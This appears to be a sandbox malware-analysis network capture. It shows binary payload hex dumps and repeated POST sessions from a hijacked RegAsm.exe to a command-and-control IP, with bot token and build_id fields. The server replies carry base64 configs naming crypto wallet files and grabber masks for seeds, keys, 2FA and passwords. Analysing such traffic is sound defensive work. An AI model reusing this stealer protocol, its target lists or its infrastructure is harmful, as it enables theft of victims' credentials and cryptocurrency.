                                                                                                                                                                                                                                        2024-09-21 12:49:12 UTC16384INData Raw: 1f 01 f2 6b d2 64 89 c7 29 d7 c1 fb 15 01 f3 89 c2 69 f3 90 01 00 00 29 f0 83 e2 03 66 85 d2 0f 94 c2 66 85 ff 0f 95 c6 20 d6 66 85 c0 0f 94 c0 08 f0 0f b6 c0 8d 04 40 8b 55 f0 0f be 84 82 20 7c 1a 10 89 41 10 8a 41 1a fe c8 0f b6 c0 ba 06 00 00 00 0f 49 d0 88 51 1a e9 f7 fe ff ff 83 c2 e8 89 51 0c 8b 41 10 89 45 f0 8b 71 14 40 89 41 10 66 ff 41 1c 0f b7 41 18 a8 03 0f 94 c3 69 f8 29 5c 00 00 8d 97 1c 05 00 00 66 c1 ca 02 0f b7 d2 81 fa 8f 02 00 00 0f 93 c2 20 da 81 c7 10 05 00 00 66 c1 cf 04 0f b7 ff 81 ff a3 00 00 00 0f 92 c6 08 d6 0f b6 d6 8d 14 52 0f be 94 96 20 7c 1a 10 39 55 f0 7c 26 89 f7 c7 41 10 01 00 00 00 8d 56 01 89 51 14 83 fe 0b 7c 12 c7 41 14 00 00 00 00 40 66 89 41 18 66 c7 41 1c 00 00 8a 41 1a fe c0 31 d2 3c 07 0f b6 c0 0f 4d c2 88 41 1a
                                                                                                                                                                                                                                        Data Ascii: kd)i)ff f@U |AAIQQAEq@AfAAi)\f fR |9U|&AVQ|A@fAfAA1<MA
                                                                                                                                                                                                                                        2024-09-21 12:49:12 UTC16384INData Raw: 52 f4 1b 10 51 e8 3d b8 06 00 83 c4 0c 66 83 7f 06 00 74 69 31 db 8b 44 9f 14 be 48 01 1d 10 85 c0 74 02 8b 30 68 d3 fe 1b 10 56 e8 f7 5b 19 00 83 c4 08 85 c0 b8 79 64 1c 10 0f 45 c6 8b 4f 10 0f b6 0c 19 f6 c1 02 ba 98 dc 1c 10 be 48 01 1d 10 0f 44 d6 f6 c1 01 b9 b1 de 1c 10 0f 44 ce 50 52 51 68 7f a0 1b 10 8d 44 24 60 50 e8 d6 b7 06 00 83 c4 14 43 0f b7 47 06 39 c3 72 99 8b 44 24 60 8d 48 01 3b 4c 24 58 0f 83 b7 03 00 00 89 4c 24 60 8b 4c 24 54 c6 04 01 29 eb 25 8b 44 24 04 8b 4c 24 08 8b 44 81 10 0f be 08 8d 54 24 50 51 ff 70 20 68 2c e2 1c 10 52 e8 89 b7 06 00 83 c4 10 f6 44 24 64 07 0f 85 4b 03 00 00 8b 44 24 54 85 c0 74 21 8b 4c 24 60 c6 04 08 00 83 7c 24 5c 00 74 12 f6 44 24 65 04 75 0b 8d 4c 24 50 e8 d4 68 06 00 eb 04 8b 44 24 54 89 44 24 18 8b 45
                                                                                                                                                                                                                                        Data Ascii: RQ=fti1DHt0hV[ydEOHDDPRQhD$`PCG9rD$`H;L$XL$`L$T)%D$L$DT$PQp h,RD$dKD$Tt!L$`|$\tD$euL$PhD$TD$E
                                                                                                                                                                                                                                        2024-09-21 12:49:12 UTC16384INData Raw: 40 a1 08 11 1e 10 40 a3 08 11 1e 10 3b 05 30 11 1e 10 77 26 8b 35 38 11 1e 10 85 f6 74 15 8b 0d 78 e0 1d 10 81 f9 80 c2 12 10 75 7b 56 ff 15 68 cc 1d 10 89 f8 5e 5f 5b 5d c3 a3 30 11 1e 10 eb d3 a3 0c 11 1e 10 eb b9 89 3d 20 11 1e 10 e9 54 ff ff ff 31 ff eb dc 8b 0d 40 e0 1d 10 ff 15 00 40 1e 10 57 ff d1 83 c4 04 eb ca ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 0b ff ff ff 89 f7 c1 ff 1f 29 f1 19 f8 31 d2 39 0d e4 10 1e 10 19 c2 7d 27 c7 05 50 11 1e 10 00 00 00 00 e9 20 ff ff ff 31 ff e9 6d ff ff ff ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 7b ff ff ff c7 05 50 11 1e 10 01 00 00 00 8b 1d 38 11 1e 10 85 db 74 2e 8b 0d 78 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 8b 1d 38 11 1e 10 85 db 74 12 8b 0d 70 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 a1 4c 11 1e 10
                                                                                                                                                                                                                                        Data Ascii: @@;0w&58txu{Vh^_[]0= T1@@W@V)19}'P 1m@V{P8t.x@S8tp@SL
                                                                                                                                                                                                                                        2024-09-21 12:49:12 UTC16384INData Raw: ff 8b 44 24 08 8a 40 12 e9 fc fc ff ff 8b 44 24 08 8b 70 44 8b 06 85 c0 0f 84 81 fd ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 67 fd ff ff 8b 44 24 08 8b 70 40 8b 06 85 c0 74 2d 8b 4c 24 08 80 79 0d 00 75 11 8b 48 20 ff 15 00 40 1e 10 6a 01 56 ff d1 83 c4 08 8b 44 24 08 80 78 12 05 74 08 8b 44 24 08 c6 40 12 01 8b 4c 24 08 8a 41 0c 88 41 13 e9 13 fe ff ff 8b 44 24 08 8b 30 8b 4e 1c 85 c9 0f 84 88 fa ff ff 8b 44 24 08 8b b8 ec 00 00 00 ff 15 00 40 1e 10 6a 00 57 56 ff d1 83 c4 0c 89 44 24 0c e9 72 f6 ff ff 8b 4c 24 08 89 81 a0 00 00 00 e9 f7 f9 ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 26 fa ff ff 31 f6 46 e9 d2 fc ff ff 31 db f6 44 24 1c 01 0f 84 40 fe ff ff 68 40 7e 1c 10 68 83 e4 00 00 68 14 dd
                                                                                                                                                                                                                                        Data Ascii: D$@D$pDH@VgD$p@t-L$yuH @jVD$xtD$@L$AAD$0ND$@jWVD$rL$H@V&1F1D$@h@~hh
                                                                                                                                                                                                                                        2024-09-21 12:49:12 UTC16384INData Raw: 18 89 d8 25 ff ff ff 7f 89 44 24 1c 85 f6 7e 6f 8b 7d 0c 89 54 24 04 8b 0d 30 e4 1d 10 8b 45 08 8b 40 08 89 04 24 ff 15 00 40 1e 10 8d 44 24 10 50 8d 44 24 10 50 56 57 ff 74 24 10 ff d1 85 c0 0f 84 92 00 00 00 8b 44 24 0c 85 c0 8b 54 24 04 74 42 29 c6 72 3e 01 c2 83 d3 00 89 54 24 18 89 d9 81 e1 ff ff ff 7f 89 4c 24 1c 01 c7 85 f6 7f a2 8b 44 24 24 85 c0 0f 85 92 00 00 00 31 ff 8b 4c 24 28 31 e9 e8 9d 64 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 8b 0d 8c e2 1d 10 ff 15 00 40 1e 10 ff d1 89 c2 8b 45 08 89 50 14 83 fa 70 74 05 83 fa 27 75 3f bf 0d 00 00 00 b9 0d 00 00 00 68 ee b2 00 00 8b 45 08 ff 70 1c 68 65 8a 1c 10 e8 c4 1e 14 00 83 c4 0c eb a7 8d 4c 24 24 8d 54 24 08 e8 12 20 14 00 85 c0 0f 85 2a ff ff ff 8b 54 24 08 eb b1 bf 0a 03 00 00 b9 0a 03 00 00 68 f3
                                                                                                                                                                                                                                        Data Ascii: %D$~o}T$0E@$@D$PD$PVWt$D$T$tB)r>T$L$D$$1L$(1de^_[]@EPpt'u?hEpheL$$T$ *T$h
                                                                                                                                                                                                                                        2024-09-21 12:49:12 UTC16384INData Raw: 64 8b 0c 38 e8 8e f3 ff ff 43 83 c7 30 3b 5e 68 7c ec 8b 44 24 0c 89 46 68 83 7c 24 04 01 75 72 8b 56 64 8d 1c 40 c1 e3 04 83 7c 1a 1c 00 74 4b 8b 4e 48 8b 01 85 c0 74 42 3d 58 00 1a 10 75 34 8b 86 a8 00 00 00 8b be ac 00 00 00 83 c0 04 83 d7 00 89 74 24 04 89 d6 8b 54 1a 18 0f af fa f7 e2 01 fa 52 50 51 e8 8c 45 12 00 89 f2 8b 74 24 10 83 c4 0c 8b 44 1a 18 89 46 38 31 ff 8b 4c 24 30 31 e9 e8 9f 24 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 89 74 24 04 8b 86 e8 00 00 00 89 44 24 08 85 c0 0f 84 88 01 00 00 83 7c 24 0c 00 0f 84 ac 00 00 00 8b 44 24 04 8b 70 64 85 f6 0f 84 9d 00 00 00 8b 44 24 0c 48 8d 3c 40 c1 e7 04 8b 44 3e 14 89 44 24 0c b9 00 02 00 00 31 d2 e8 56 3e ff ff 89 44 24 18 85 c0 0f 84 ce 02 00 00 8d 04 3e 89 44 24 14 8d 04 3e 83 c0 14 89 44 24 08 8b
                                                                                                                                                                                                                                        Data Ascii: d8C0;^h|D$Fh|$urVd@|tKNHtB=Xu4t$TRPQEt$DF81L$01$e^_[]t$D$|$D$pdD$H<@D>D$1V>D$>D$>D$
                                                                                                                                                                                                                                        2024-09-21 12:49:12 UTC16384INData Raw: e7 00 00 00 8b 99 4c 01 00 00 85 db 0f 85 82 00 00 00 8b 99 48 01 00 00 85 db 75 6b 8b 99 44 01 00 00 85 db 75 7b ff 81 40 01 00 00 8a 5d f3 88 d8 50 e8 d0 ca 11 00 83 c4 04 89 c3 85 c0 0f 84 a7 00 00 00 57 ff 75 e4 53 e8 0f 1c 18 00 83 c4 0c c6 04 3b 00 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c 89 18 0f b6 0b 80 b9 7a f8 19 10 00 78 4a 8b 4d e8 80 b9 d0 00 00 00 02 0f 83 83 00 00 00 83 c4 10 5e 5f 5b 5d c3 8b 03 89 81 48 01 00 00 e9 50 ff ff ff 8b 03 89 81 4c 01 00 00 e9 43 ff ff ff 8b 03 89 81 44 01 00 00 e9 36 ff ff ff ff 81 3c 01 00 00 e9 73 ff ff ff 80 f9 5b 0f b6 c9 ba 5d 00 00 00 0f 45 d1 89 55 ec 31 f6 46 89 df 8a 0c 33 3a 4d ec 74 06 88 0f 46 47 eb f2 8b 4d ec 38 4c 33 01 74 2d c6 07 00 eb 84 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c c7 00 00 00 00 00 e9 6d
                                                                                                                                                                                                                                        Data Ascii: LHukDu{@]PWuS;MzxJM^_[]HPLCD6<s[]EU1F3:MtFGM8L3t-Mm
                                                                                                                                                                                                                                        2024-09-21 12:49:12 UTC16384INData Raw: 59 18 e8 60 50 fe ff 31 c0 39 46 24 0f 84 b8 f6 ff ff 8b 57 10 85 d2 74 09 8b 4c 24 20 e8 75 c2 ff ff 8b 7c 24 0c c7 47 10 00 00 00 00 e9 98 f6 ff ff 8b 06 89 81 44 01 00 00 e9 e3 f9 ff ff ff 81 3c 01 00 00 e9 80 fc ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 85 f3 fb ff ff 8b 44 24 20 8b 40 10 8b 4c 38 0c 83 79 48 00 0f 85 de fb ff ff ff 34 38 68 b4 e0 1c 10 ff 74 24 1c e8 06 09 00 00 83 c4 0c e9 c5 fb ff ff 8b 4c 24 1c e9 ae fd ff ff 8a 80 08 f7 19 10 3a 83 08 f7 19 10 0f 84 02 fa ff ff e9 c9 f9 ff ff 8b 44 24 20 80 b8 b1 00 00 00 00 0f 84 47 04 00 00 68 48 01 1d 10 ff 74 24 18 e8 5f 2a 01 00 83 c4 08 e9 33 f7 ff ff 8b 44 24 0c 80 48 1e 01 66 83 78 22 00 0f 8e a5 f5 ff ff 31 c9 b8 0e 00 00 00 8b 54 24 0c 8b 52 04 8b 74 02 f6 89 f7 c1 ef 04 83 e7 0f 83 ff
                                                                                                                                                                                                                                        Data Ascii: Y`P19F$WtL$ u|$GD<D$D$ @L8yH48ht$L$:D$ GhHt$_*3D$Hfx"1T$Rt
                                                                                                                                                                                                                                        2024-09-21 12:49:13 UTC16384INData Raw: 00 00 85 c0 0f 85 34 f9 ff ff e9 a7 e8 ff ff c7 44 24 24 00 00 00 00 e9 0b f1 ff ff 8b 44 24 0c 8b 40 10 8b 40 1c 8b 4c 24 08 3b 41 3c 0f 84 95 ea ff ff 8b 7c 24 08 ff 37 68 27 f8 1c 10 ff 74 24 0c e8 e0 ea 00 00 83 c4 0c c7 44 24 24 00 00 00 00 e9 a2 f0 ff ff 68 48 e4 1b 10 8b 7c 24 08 57 e8 c1 ea 00 00 83 c4 08 be 0b 00 00 00 68 40 7e 1c 10 68 14 ce 01 00 68 40 bb 1b 10 68 78 fc 1b 10 56 e8 8f 4f 01 00 83 c4 14 89 77 0c c7 44 24 1c 00 00 00 00 e9 83 f8 ff ff 66 ba 1e 00 31 c0 85 c9 0f 85 54 f1 ff ff 31 d2 e9 5b f1 ff ff 31 ff 66 ba 28 00 be ff 0f 00 00 89 cb 31 c0 83 c2 28 89 f9 0f a4 d9 1c c1 e8 04 39 de bb 00 00 00 00 19 fb 89 cb 89 c7 0f 83 f2 f0 ff ff eb df a9 fd ff ff ff 74 65 31 f6 46 b8 ec bb 1b 10 e9 c1 fd ff ff 31 c0 e9 85 f2 ff ff c7 44 24 18
                                                                                                                                                                                                                                        Data Ascii: 4D$$D$@@L$;A<|$7h't$D$$hH|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        25192.168.2.949769116.203.165.1274437436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-09-21 12:49:16 UTC281OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----JECAFHJEGCFCBFIEGCAE
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                        Host: 116.203.165.127
                                                                                                                                                                                                                                        Content-Length: 1145
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        2024-09-21 12:49:16 UTC1145OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 45 43 41 46 48 4a 45 47 43 46 43 42 46 49 45 47 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 37 64 38 65 66 31 64 38 39 33 33 66 32 35 34 37 34 63 62 36 31 35 64 31 63 65 30 32 36 61 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 43 41 46 48 4a 45 47 43 46 43 42 46 49 45 47 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 33 61 31 35 32 33 37 61 61 39 32 64 63 64 38 63 63 63 61 34 34 37 32 31 31 66 62 35 66 63 32 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 43 41 46 48 4a 45 47 43 46 43 42 46 49 45 47 43 41 45 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                        Data Ascii: ------JECAFHJEGCFCBFIEGCAEContent-Disposition: form-data; name="token"b7d8ef1d8933f25474cb615d1ce026a4------JECAFHJEGCFCBFIEGCAEContent-Disposition: form-data; name="build_id"3a15237aa92dcd8ccca447211fb5fc2a------JECAFHJEGCFCBFIEGCAECont
                                                                                                                                                                                                                                        2024-09-21 12:49:16 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:49:16 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        2024-09-21 12:49:16 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 2ok0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        26192.168.2.949770116.203.165.1274437436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-09-21 12:49:18 UTC280OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----HIDAAKEGDBFIJJKFHCFB
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                        Host: 116.203.165.127
                                                                                                                                                                                                                                        Content-Length: 331
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        2024-09-21 12:49:18 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 48 49 44 41 41 4b 45 47 44 42 46 49 4a 4a 4b 46 48 43 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 37 64 38 65 66 31 64 38 39 33 33 66 32 35 34 37 34 63 62 36 31 35 64 31 63 65 30 32 36 61 34 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 41 41 4b 45 47 44 42 46 49 4a 4a 4b 46 48 43 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 33 61 31 35 32 33 37 61 61 39 32 64 63 64 38 63 63 63 61 34 34 37 32 31 31 66 62 35 66 63 32 61 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 41 41 4b 45 47 44 42 46 49 4a 4a 4b 46 48 43 46 42 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                        Data Ascii: ------HIDAAKEGDBFIJJKFHCFBContent-Disposition: form-data; name="token"b7d8ef1d8933f25474cb615d1ce026a4------HIDAAKEGDBFIJJKFHCFBContent-Disposition: form-data; name="build_id"3a15237aa92dcd8ccca447211fb5fc2a------HIDAAKEGDBFIJJKFHCFBCont
                                                                                                                                                                                                                                        2024-09-21 12:49:18 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:49:18 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        2024-09-21 12:49:18 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                                                                                                                                                                                                        Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        27192.168.2.949771116.203.165.1274437436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-09-21 12:49:19 UTC280OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----DHJJEGHIIDAFIDHJDHJE
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                        Host: 116.203.165.127
                                                                                                                                                                                                                                        Content-Length: 331
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        2024-09-21 12:49:19 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 44 48 4a 4a 45 47 48 49 49 44 41 46 49 44 48 4a 44 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 37 64 38 65 66 31 64 38 39 33 33 66 32 35 34 37 34 63 62 36 31 35 64 31 63 65 30 32 36 61 34 0d 0a 2d 2d 2d 2d 2d 2d 44 48 4a 4a 45 47 48 49 49 44 41 46 49 44 48 4a 44 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 33 61 31 35 32 33 37 61 61 39 32 64 63 64 38 63 63 63 61 34 34 37 32 31 31 66 62 35 66 63 32 61 0d 0a 2d 2d 2d 2d 2d 2d 44 48 4a 4a 45 47 48 49 49 44 41 46 49 44 48 4a 44 48 4a 45 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                        Data Ascii: ------DHJJEGHIIDAFIDHJDHJEContent-Disposition: form-data; name="token"b7d8ef1d8933f25474cb615d1ce026a4------DHJJEGHIIDAFIDHJDHJEContent-Disposition: form-data; name="build_id"3a15237aa92dcd8ccca447211fb5fc2a------DHJJEGHIIDAFIDHJDHJECont
                                                                                                                                                                                                                                        2024-09-21 12:49:20 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:49:20 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        2024-09-21 12:49:20 UTC1524INData Raw: 35 65 38 0d 0a 52 6d 78 68 63 32 68 38 4a 55 52 53 53 56 5a 46 58 31 4a 46 54 55 39 57 51 55 4a 4d 52 53 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69
                                                                                                                                                                                                                                        Data Ascii: 5e8Rmxhc2h8JURSSVZFX1JFTU9WQUJMRSVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKi


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        28192.168.2.949773116.203.165.1274437436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-09-21 12:49:22 UTC280OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----CBFIJEGIDBGIECAKKEGD
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                        Host: 116.203.165.127
                                                                                                                                                                                                                                        Content-Length: 461
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        2024-09-21 12:49:22 UTC461OUTData Raw: 2d 2d 2d 2d 2d 2d 43 42 46 49 4a 45 47 49 44 42 47 49 45 43 41 4b 4b 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 37 64 38 65 66 31 64 38 39 33 33 66 32 35 34 37 34 63 62 36 31 35 64 31 63 65 30 32 36 61 34 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 49 4a 45 47 49 44 42 47 49 45 43 41 4b 4b 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 33 61 31 35 32 33 37 61 61 39 32 64 63 64 38 63 63 63 61 34 34 37 32 31 31 66 62 35 66 63 32 61 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 49 4a 45 47 49 44 42 47 49 45 43 41 4b 4b 45 47 44 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                        Data Ascii: ------CBFIJEGIDBGIECAKKEGDContent-Disposition: form-data; name="token"b7d8ef1d8933f25474cb615d1ce026a4------CBFIJEGIDBGIECAKKEGDContent-Disposition: form-data; name="build_id"3a15237aa92dcd8ccca447211fb5fc2a------CBFIJEGIDBGIECAKKEGDCont
                                                                                                                                                                                                                                        2024-09-21 12:49:23 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:49:23 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        2024-09-21 12:49:23 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 2ok0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        29192.168.2.949774116.203.165.1274437436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-09-21 12:49:25 UTC283OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----BGHJJDGHCBGDHIECBGID
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                        Host: 116.203.165.127
                                                                                                                                                                                                                                        Content-Length: 130901
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Cache-Control: no-cache
